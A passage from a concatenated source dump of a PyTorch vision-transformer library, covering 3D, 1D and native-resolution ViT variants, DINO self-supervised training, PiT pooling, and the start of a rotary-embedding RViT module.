// 2), Rearrange('b c n -> b n c'), Transformer(dim = layer_dim, heads = 1, depth = 1, dim_head = layer_dim, mlp_dim = layer_dim, dropout = dropout) if not is_last else nn.Identity(), ]) layers.append(nn.Linear(layer_dim, dim)) self.to_patch_embedding = nn.Sequential(*layers) self.pos_embedding = nn.Parameter(torch.randn(1, output_image_size ** 2 + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) if not exists(transformer): assert all([exists(depth), exists(heads), exists(mlp_dim)]), 'depth, heads, and mlp_dim must be 
supplied' self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) else: self.transformer = transformer self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Linear(dim, num_classes) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :n+1] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/vit_3d.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, image_size, image_patch_size, frames, frame_patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(image_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' 
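# Illustrative sketch (hypothetical numbers, not from the source): for a 224 x 224 clip of
# 16 frames with image_patch_size = 16 and frame_patch_size = 2, the tubelet grid gives
# num_patches = (224 // 16) * (224 // 16) * (16 // 2) = 14 * 14 * 8 = 1568 tokens, and each
# flattened tubelet has patch_dim = 3 * 16 * 16 * 2 = 1536 values before the linear projection.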
assert frames % frame_patch_size == 0, 'Frames must be divisible by frame patch size' num_patches = (image_height // patch_height) * (image_width // patch_width) * (frames // frame_patch_size) patch_dim = channels * patch_height * patch_width * frame_patch_size assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (f pf) (h p1) (w p2) -> b (f h w) (p1 p2 pf c)', p1 = patch_height, p2 = patch_width, pf = frame_patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, video): x = self.to_patch_embedding(video) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/na_vit.py from __future__ import annotations from functools import partial from typing import List import torch import torch.nn.functional as F from torch import nn, Tensor from torch.nn.utils.rnn import pad_sequence as orig_pad_sequence from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def always(val): return lambda *args: val def pair(t): return t if isinstance(t, tuple) else (t, t) def divisible_by(numer, denom): return (numer % denom) == 0 # auto grouping images def group_images_by_max_seq_len( images: List[Tensor], patch_size: int, calc_token_dropout = None, max_seq_len = 2048 ) -> List[List[Tensor]]: calc_token_dropout = default(calc_token_dropout, always(0.)) groups = [] group = [] seq_len = 0 if isinstance(calc_token_dropout, (float, int)): calc_token_dropout = always(calc_token_dropout) for image in images: assert isinstance(image, Tensor) image_dims = image.shape[-2:] ph, pw = map(lambda t: t // patch_size, image_dims) image_seq_len = (ph * pw) image_seq_len = int(image_seq_len * (1 - calc_token_dropout(*image_dims))) assert image_seq_len <= max_seq_len, f'image with dimensions {image_dims} exceeds maximum sequence length' if (seq_len + image_seq_len) > max_seq_len: groups.append(group) group = [] seq_len = 0 group.append(image) seq_len += image_seq_len if len(group) > 0: groups.append(group) return groups # normalization # they use layernorm without bias, something that pytorch does not offer class LayerNorm(nn.Module): def __init__(self, dim): super().__init__() self.gamma = nn.Parameter(torch.ones(dim)) self.register_buffer('beta', torch.zeros(dim)) def forward(self, x): return F.layer_norm(x, x.shape[-1:], self.gamma, self.beta) # they use a query-key normalization that is equivalent to rms norm (no mean-centering, learned gamma), from vit 22B paper class RMSNorm(nn.Module): def __init__(self, heads, dim): super().__init__() self.scale = dim ** 0.5 self.gamma = nn.Parameter(torch.ones(heads, 1, dim)) def forward(self, x): normed = F.normalize(x, dim = -1) return normed * self.scale * self.gamma # feedforward def 
FeedForward(dim, hidden_dim, dropout = 0.): return nn.Sequential( LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.norm = LayerNorm(dim) self.q_norm = RMSNorm(heads, dim_head) self.k_norm = RMSNorm(heads, dim_head) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim, bias = False), nn.Dropout(dropout) ) def forward( self, x, context = None, mask = None, attn_mask = None ): x = self.norm(x) kv_input = default(context, x) qkv = (self.to_q(x), *self.to_kv(kv_input).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) q = self.q_norm(q) k = self.k_norm(k) dots = torch.matmul(q, k.transpose(-1, -2)) if exists(mask): mask = rearrange(mask, 'b j -> b 1 1 j') dots = dots.masked_fill(~mask, -torch.finfo(dots.dtype).max) if exists(attn_mask): dots = dots.masked_fill(~attn_mask, -torch.finfo(dots.dtype).max) attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) self.norm = LayerNorm(dim) def forward( self, x, mask = None, attn_mask = None ): for attn, ff in self.layers: x = attn(x, mask = mask, attn_mask = attn_mask) + x x = ff(x) + x return self.norm(x) class NaViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., token_dropout_prob = None): super().__init__() image_height, image_width = pair(image_size) # what percent of tokens to dropout # if int or float given, then assume constant dropout prob # otherwise accept a callback that in turn calculates dropout prob from height and width self.calc_token_dropout = None if callable(token_dropout_prob): self.calc_token_dropout = token_dropout_prob elif isinstance(token_dropout_prob, (float, int)): assert 0. <= token_dropout_prob < 1. token_dropout_prob = float(token_dropout_prob) self.calc_token_dropout = lambda height, width: token_dropout_prob # calculate patching related stuff assert divisible_by(image_height, patch_size) and divisible_by(image_width, patch_size), 'Image dimensions must be divisible by the patch size.' 
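# Illustrative sketch (hypothetical numbers, not from the source): with image_size = 256 and
# patch_size = 32, the factorized tables below are pos_embed_height and pos_embed_width of
# shape (8, dim) each, and a patch at grid position (h, w) receives
# pos_embed_height[h] + pos_embed_width[w]; a constant token_dropout_prob = 0.1 would keep
# max(1, int(0.9 * ph * pw)) randomly chosen patches of each image during training.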
patch_height_dim, patch_width_dim = (image_height // patch_size), (image_width // patch_size) patch_dim = channels * (patch_size ** 2) self.channels = channels self.patch_size = patch_size self.to_patch_embedding = nn.Sequential( LayerNorm(patch_dim), nn.Linear(patch_dim, dim), LayerNorm(dim), ) self.pos_embed_height = nn.Parameter(torch.randn(patch_height_dim, dim)) self.pos_embed_width = nn.Parameter(torch.randn(patch_width_dim, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) # final attention pooling queries self.attn_pool_queries = nn.Parameter(torch.randn(dim)) self.attn_pool = Attention(dim = dim, dim_head = dim_head, heads = heads) # output to logits self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( LayerNorm(dim), nn.Linear(dim, num_classes, bias = False) ) @property def device(self): return next(self.parameters()).device def forward( self, batched_images: List[Tensor] | List[List[Tensor]], # assume different resolution images already grouped correctly group_images = False, group_max_seq_len = 2048 ): p, c, device, has_token_dropout = self.patch_size, self.channels, self.device, exists(self.calc_token_dropout) and self.training arange = partial(torch.arange, device = device) pad_sequence = partial(orig_pad_sequence, batch_first = True) # auto pack if specified if group_images: batched_images = group_images_by_max_seq_len( batched_images, patch_size = self.patch_size, calc_token_dropout = self.calc_token_dropout if self.training else None, max_seq_len = group_max_seq_len ) # if List[Tensor] is not grouped -> List[List[Tensor]] if torch.is_tensor(batched_images[0]): batched_images = [batched_images] # process images into variable lengthed sequences with attention mask num_images = [] batched_sequences = [] batched_positions = [] batched_image_ids = [] for images in batched_images: num_images.append(len(images)) sequences = [] positions = [] image_ids = torch.empty((0,), device = device, dtype = torch.long) for image_id, image in enumerate(images): assert image.ndim ==3 and image.shape[0] == c image_dims = image.shape[-2:] assert all([divisible_by(dim, p) for dim in image_dims]), f'height and width {image_dims} of images must be divisible by patch size {p}' ph, pw = map(lambda dim: dim // p, image_dims) pos = torch.stack(torch.meshgrid(( arange(ph), arange(pw) ), indexing = 'ij'), dim = -1) pos = rearrange(pos, 'h w c -> (h w) c') seq = rearrange(image, 'c (h p1) (w p2) -> (h w) (c p1 p2)', p1 = p, p2 = p) seq_len = seq.shape[-2] if has_token_dropout: token_dropout = self.calc_token_dropout(*image_dims) num_keep = max(1, int(seq_len * (1 - token_dropout))) keep_indices = torch.randn((seq_len,), device = device).topk(num_keep, dim = -1).indices seq = seq[keep_indices] pos = pos[keep_indices] image_ids = F.pad(image_ids, (0, seq.shape[-2]), value = image_id) sequences.append(seq) positions.append(pos) batched_image_ids.append(image_ids) batched_sequences.append(torch.cat(sequences, dim = 0)) batched_positions.append(torch.cat(positions, dim = 0)) # derive key padding mask lengths = torch.tensor([seq.shape[-2] for seq in batched_sequences], device = device, dtype = torch.long) seq_arange = arange(lengths.amax().item()) key_pad_mask = rearrange(seq_arange, 'n -> 1 n') < rearrange(lengths, 'b -> b 1') # derive attention mask, and combine with key padding mask from above batched_image_ids = pad_sequence(batched_image_ids) attn_mask = rearrange(batched_image_ids, 'b i -> b 1 i 1') == 
rearrange(batched_image_ids, 'b j -> b 1 1 j') attn_mask = attn_mask & rearrange(key_pad_mask, 'b j -> b 1 1 j') # combine patched images as well as the patched width / height positions for 2d positional embedding patches = pad_sequence(batched_sequences) patch_positions = pad_sequence(batched_positions) # need to know how many images for final attention pooling num_images = torch.tensor(num_images, device = device, dtype = torch.long) # to patches x = self.to_patch_embedding(patches) # factorized 2d absolute positional embedding h_indices, w_indices = patch_positions.unbind(dim = -1) h_pos = self.pos_embed_height[h_indices] w_pos = self.pos_embed_width[w_indices] x = x + h_pos + w_pos # embed dropout x = self.dropout(x) # attention x = self.transformer(x, attn_mask = attn_mask) # do attention pooling at the end max_queries = num_images.amax().item() queries = repeat(self.attn_pool_queries, 'd -> b n d', n = max_queries, b = x.shape[0]) # attention pool mask image_id_arange = arange(max_queries) attn_pool_mask = rearrange(image_id_arange, 'i -> i 1') == rearrange(batched_image_ids, 'b j -> b 1 j') attn_pool_mask = attn_pool_mask & rearrange(key_pad_mask, 'b j -> b 1 j') attn_pool_mask = rearrange(attn_pool_mask, 'b i j -> b 1 i j') # attention pool x = self.attn_pool(queries, context = x, attn_mask = attn_pool_mask) + queries x = rearrange(x, 'b n d -> (b n) d') # each batch element may not have same amount of images is_images = image_id_arange < rearrange(num_images, 'b -> b 1') is_images = rearrange(is_images, 'b n -> (b n)') x = x[is_images] # project out to logits x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/dino.py import copy import random from functools import wraps, partial import torch from torch import nn import torch.nn.functional as F from torchvision import transforms as T # helper functions def exists(val): return val is not None def default(val, default): return val if exists(val) else default def singleton(cache_key): def inner_fn(fn): @wraps(fn) def wrapper(self, *args, **kwargs): instance = getattr(self, cache_key) if instance is not None: return instance instance = fn(self, *args, **kwargs) setattr(self, cache_key, instance) return instance return wrapper return inner_fn def get_module_device(module): return next(module.parameters()).device def set_requires_grad(model, val): for p in model.parameters(): p.requires_grad = val # loss function # (algorithm 1 in the paper) def loss_fn( teacher_logits, student_logits, teacher_temp, student_temp, centers, eps = 1e-20 ): teacher_logits = teacher_logits.detach() student_probs = (student_logits / student_temp).softmax(dim = -1) teacher_probs = ((teacher_logits - centers) / teacher_temp).softmax(dim = -1) return - (teacher_probs * torch.log(student_probs + eps)).sum(dim = -1).mean() # augmentation utils class RandomApply(nn.Module): def __init__(self, fn, p): super().__init__() self.fn = fn self.p = p def forward(self, x): if random.random() > self.p: return x return self.fn(x) # exponential moving average class EMA(): def __init__(self, beta): super().__init__() self.beta = beta def update_average(self, old, new): if old is None: return new return old * self.beta + (1 - self.beta) * new def update_moving_average(ema_updater, ma_model, current_model): for current_params, ma_params in zip(current_model.parameters(), ma_model.parameters()): old_weight, up_weight = ma_params.data, current_params.data ma_params.data = ema_updater.update_average(old_weight, up_weight) # MLP class for projector and predictor class 
L2Norm(nn.Module): def forward(self, x, eps = 1e-6): norm = x.norm(dim = 1, keepdim = True).clamp(min = eps) return x / norm class MLP(nn.Module): def __init__(self, dim, dim_out, num_layers, hidden_size = 256): super().__init__() layers = [] dims = (dim, *((hidden_size,) * (num_layers - 1))) for ind, (layer_dim_in, layer_dim_out) in enumerate(zip(dims[:-1], dims[1:])): is_last = ind == (len(dims) - 1) layers.extend([ nn.Linear(layer_dim_in, layer_dim_out), nn.GELU() if not is_last else nn.Identity() ]) self.net = nn.Sequential( *layers, L2Norm(), nn.Linear(hidden_size, dim_out) ) def forward(self, x): return self.net(x) # a wrapper class for the base neural network # will manage the interception of the hidden layer output # and pipe it into the projecter and predictor nets class NetWrapper(nn.Module): def __init__(self, net, output_dim, projection_hidden_size, projection_num_layers, layer = -2): super().__init__() self.net = net self.layer = layer self.projector = None self.projection_hidden_size = projection_hidden_size self.projection_num_layers = projection_num_layers self.output_dim = output_dim self.hidden = {} self.hook_registered = False def _find_layer(self): if type(self.layer) == str: modules = dict([*self.net.named_modules()]) return modules.get(self.layer, None) elif type(self.layer) == int: children = [*self.net.children()] return children[self.layer] return None def _hook(self, _, input, output): device = input[0].device self.hidden[device] = output.flatten(1) def _register_hook(self): layer = self._find_layer() assert layer is not None, f'hidden layer ({self.layer}) not found' handle = layer.register_forward_hook(self._hook) self.hook_registered = True @singleton('projector') def _get_projector(self, hidden): _, dim = hidden.shape projector = MLP(dim, self.output_dim, self.projection_num_layers, self.projection_hidden_size) return projector.to(hidden) def get_embedding(self, x): if self.layer == -1: return self.net(x) if not self.hook_registered: self._register_hook() self.hidden.clear() _ = self.net(x) hidden = self.hidden[x.device] self.hidden.clear() assert hidden is not None, f'hidden layer {self.layer} never emitted an output' return hidden def forward(self, x, return_projection = True): embed = self.get_embedding(x) if not return_projection: return embed projector = self._get_projector(embed) return projector(embed), embed # main class class Dino(nn.Module): def __init__( self, net, image_size, hidden_layer = -2, projection_hidden_size = 256, num_classes_K = 65336, projection_layers = 4, student_temp = 0.9, teacher_temp = 0.04, local_upper_crop_scale = 0.4, global_lower_crop_scale = 0.5, moving_average_decay = 0.9, center_moving_average_decay = 0.9, augment_fn = None, augment_fn2 = None ): super().__init__() self.net = net # default BYOL augmentation DEFAULT_AUG = torch.nn.Sequential( RandomApply( T.ColorJitter(0.8, 0.8, 0.8, 0.2), p = 0.3 ), T.RandomGrayscale(p=0.2), T.RandomHorizontalFlip(), RandomApply( T.GaussianBlur((3, 3), (1.0, 2.0)), p = 0.2 ), T.Normalize( mean=torch.tensor([0.485, 0.456, 0.406]), std=torch.tensor([0.229, 0.224, 0.225])), ) self.augment1 = default(augment_fn, DEFAULT_AUG) self.augment2 = default(augment_fn2, DEFAULT_AUG) # local and global crops self.local_crop = T.RandomResizedCrop((image_size, image_size), scale = (0.05, local_upper_crop_scale)) self.global_crop = T.RandomResizedCrop((image_size, image_size), scale = (global_lower_crop_scale, 1.)) self.student_encoder = NetWrapper(net, num_classes_K, projection_hidden_size, 
projection_layers, layer = hidden_layer) self.teacher_encoder = None self.teacher_ema_updater = EMA(moving_average_decay) self.register_buffer('teacher_centers', torch.zeros(1, num_classes_K)) self.register_buffer('last_teacher_centers', torch.zeros(1, num_classes_K)) self.teacher_centering_ema_updater = EMA(center_moving_average_decay) self.student_temp = student_temp self.teacher_temp = teacher_temp # get device of network and make wrapper same device device = get_module_device(net) self.to(device) # send a mock image tensor to instantiate singleton parameters self.forward(torch.randn(2, 3, image_size, image_size, device=device)) @singleton('teacher_encoder') def _get_teacher_encoder(self): teacher_encoder = copy.deepcopy(self.student_encoder) set_requires_grad(teacher_encoder, False) return teacher_encoder def reset_moving_average(self): del self.teacher_encoder self.teacher_encoder = None def update_moving_average(self): assert self.teacher_encoder is not None, 'target encoder has not been created yet' update_moving_average(self.teacher_ema_updater, self.teacher_encoder, self.student_encoder) new_teacher_centers = self.teacher_centering_ema_updater.update_average(self.teacher_centers, self.last_teacher_centers) self.teacher_centers.copy_(new_teacher_centers) def forward( self, x, return_embedding = False, return_projection = True, student_temp = None, teacher_temp = None ): if return_embedding: return self.student_encoder(x, return_projection = return_projection) image_one, image_two = self.augment1(x), self.augment2(x) local_image_one, local_image_two = self.local_crop(image_one), self.local_crop(image_two) global_image_one, global_image_two = self.global_crop(image_one), self.global_crop(image_two) student_proj_one, _ = self.student_encoder(local_image_one) student_proj_two, _ = self.student_encoder(local_image_two) with torch.no_grad(): teacher_encoder = self._get_teacher_encoder() teacher_proj_one, _ = teacher_encoder(global_image_one) teacher_proj_two, _ = teacher_encoder(global_image_two) loss_fn_ = partial( loss_fn, student_temp = default(student_temp, self.student_temp), teacher_temp = default(teacher_temp, self.teacher_temp), centers = self.teacher_centers ) teacher_logits_avg = torch.cat((teacher_proj_one, teacher_proj_two)).mean(dim = 0) self.last_teacher_centers.copy_(teacher_logits_avg) loss = (loss_fn_(teacher_proj_one, student_proj_two) + loss_fn_(teacher_proj_two, student_proj_one)) / 2 return loss File: vit_pytorch/vit_1d.py import torch from torch import nn from einops import rearrange, repeat, pack, unpack from einops.layers.torch import Rearrange # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n 
(h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, seq_len, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() assert (seq_len % patch_size) == 0 num_patches = seq_len // patch_size patch_dim = channels * patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (n p) -> b n (p c)', p = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, series): x = self.to_patch_embedding(series) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, 'd -> b d', b = b) x, ps = pack([cls_tokens, x], 'b * d') x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) cls_tokens, _ = unpack(x, ps, 'b * d') return self.mlp_head(cls_tokens) if __name__ == '__main__': v = ViT( seq_len = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) time_series = torch.randn(4, 3, 256) logits = v(time_series) # (4, 1000) File: vit_pytorch/pit.py from math import sqrt import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def cast_tuple(val, num): return val if isinstance(val, tuple) else (val,) * num def conv_output_size(image_size, kernel_size, stride, padding = 0): return int(((image_size - kernel_size + (2 * padding)) / stride) + 1) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): b, n, _, h = *x.shape, self.heads x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = 
self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x # depthwise convolution, for pooling class DepthWiseConv2d(nn.Module): def __init__(self, dim_in, dim_out, kernel_size, padding, stride, bias = True): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim_in, dim_out, kernel_size = kernel_size, padding = padding, groups = dim_in, stride = stride, bias = bias), nn.Conv2d(dim_out, dim_out, kernel_size = 1, bias = bias) ) def forward(self, x): return self.net(x) # pooling layer class Pool(nn.Module): def __init__(self, dim): super().__init__() self.downsample = DepthWiseConv2d(dim, dim * 2, kernel_size = 3, stride = 2, padding = 1) self.cls_ff = nn.Linear(dim, dim * 2) def forward(self, x): cls_token, tokens = x[:, :1], x[:, 1:] cls_token = self.cls_ff(cls_token) tokens = rearrange(tokens, 'b (h w) c -> b c h w', h = int(sqrt(tokens.shape[1]))) tokens = self.downsample(tokens) tokens = rearrange(tokens, 'b c h w -> b (h w) c') return torch.cat((cls_token, tokens), dim = 1) # main class class PiT(nn.Module): def __init__( self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, dim_head = 64, dropout = 0., emb_dropout = 0., channels = 3 ): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' assert isinstance(depth, tuple), 'depth must be a tuple of integers, specifying the number of blocks before each downsizing' heads = cast_tuple(heads, len(depth)) patch_dim = channels * patch_size ** 2 self.to_patch_embedding = nn.Sequential( nn.Unfold(kernel_size = patch_size, stride = patch_size // 2), Rearrange('b c n -> b n c'), nn.Linear(patch_dim, dim) ) output_size = conv_output_size(image_size, patch_size, patch_size // 2) num_patches = output_size ** 2 self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) layers = [] for ind, (layer_depth, layer_heads) in enumerate(zip(depth, heads)): not_last = ind < (len(depth) - 1) layers.append(Transformer(dim, layer_depth, layer_heads, dim_head, mlp_dim, dropout)) if not_last: layers.append(Pool(dim)) dim *= 2 self.layers = nn.Sequential(*layers) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :n+1] x = self.dropout(x) x = self.layers(x) return self.mlp_head(x[:, 0]) File: vit_pytorch/rvt.py from math import sqrt, pi, log import torch from torch import nn, einsum import torch.nn.functional as F from torch.cuda.amp import autocast from einops import rearrange, repeat from einops.layers.torch import Rearrange # rotary embeddings @autocast(enabled = False) def rotate_every_two(x): x = rearrange(x, '... (d j) -> ... d j', j = 2) x1, x2 = x.unbind(dim = -1) x = torch.stack((-x2, x1), dim = -1) return rearrange(x, '... d j -> ... 
(d j)') class AxialRotaryEmbedding(nn.Module): def __init__(self, dim, max_freq = 10): super().__init__() self.dim = dim scales = torch.linspace(1., max_freq / 2, self.dim // 4) self.register_buffer('scales', scales) @autocast(enabled = False) def forward(self, x): device, dtype, n = x.device, x.dtype, int(sqrt(x.shape[-2])) seq = torch.linspace(-1., 1., steps = n, device = device) seq = seq.unsqueeze(-1) scales = self.scales[(*((None,) * (len(seq.shape) - 1)), Ellipsis)] scales = scales.to(x) seq = seq * scales * pi x_sinu = repeat(seq, 'i d -> i j d', j = n) y_sinu = repeat(seq, 'j d -> i j d', i = n) sin = torch.cat((x_sinu.sin(), y_sinu.sin()), dim = -1) cos = torch.cat((x_sinu.cos(), y_sinu.cos()), dim = -1) sin, cos = map(lambda t: rearrange(t, 'i j d -> (i j) d'), (sin, cos)) sin, cos = map(lambda t: repeat(t, 'n d -> () n (d j)', j = 2), (sin, cos)) return sin, cos class DepthWiseConv2d(nn.Module): def __init__(self, dim_in, dim_out, kernel_size, padding, stride = 1, bias = True): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim_in, dim_in, kernel_size = kernel_size, padding = padding, groups = dim_in, stride = stride, bias = bias), nn.Conv2d(dim_in, dim_out, kernel_size = 1, bias = bias) ) def forward(self, x): return self.net(x) # helper classes class SpatialConv(nn.Module): def __init__(self, dim_in, dim_out, kernel, bias = False): super().__init__() self.conv 